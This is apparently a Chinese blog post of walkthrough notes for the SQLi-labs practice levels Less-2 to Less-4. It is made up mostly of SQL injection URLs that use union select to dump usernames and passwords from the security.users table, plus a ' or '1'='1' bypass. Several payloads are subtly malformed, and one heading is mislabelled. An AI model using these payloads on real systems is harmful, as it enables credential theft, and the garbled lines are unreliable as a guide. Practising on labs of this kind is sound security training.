当前位置:首页 > 数据库 > 正文

sqllab less 2- less 4

2024-03-31 数据库

less 2 跟less 1区别: 去掉单引号查询表的用户名与密码

 http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,‘:‘,password) from security.users --   

 less 3 跟less 1 区别: 加上)将SQL 语句闭合

http://10.9.2.81/Less-3/?id=1 ‘)or ‘1‘=‘1‘ -- 

  less 3 跟less 1 区别: 加上)将SQL 语句闭合

http://10.9.2.81/Less-4/?id=-1") union select 1,2,group_concat(username,':',password) from security.users -- 

less 4 跟less 3 区别 ‘ 变成 ”


http://10.9.2.81/Less-3/?id=-1’union select2,3,group_concat(username,:,password) from security.users--

温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/SQL/12944.html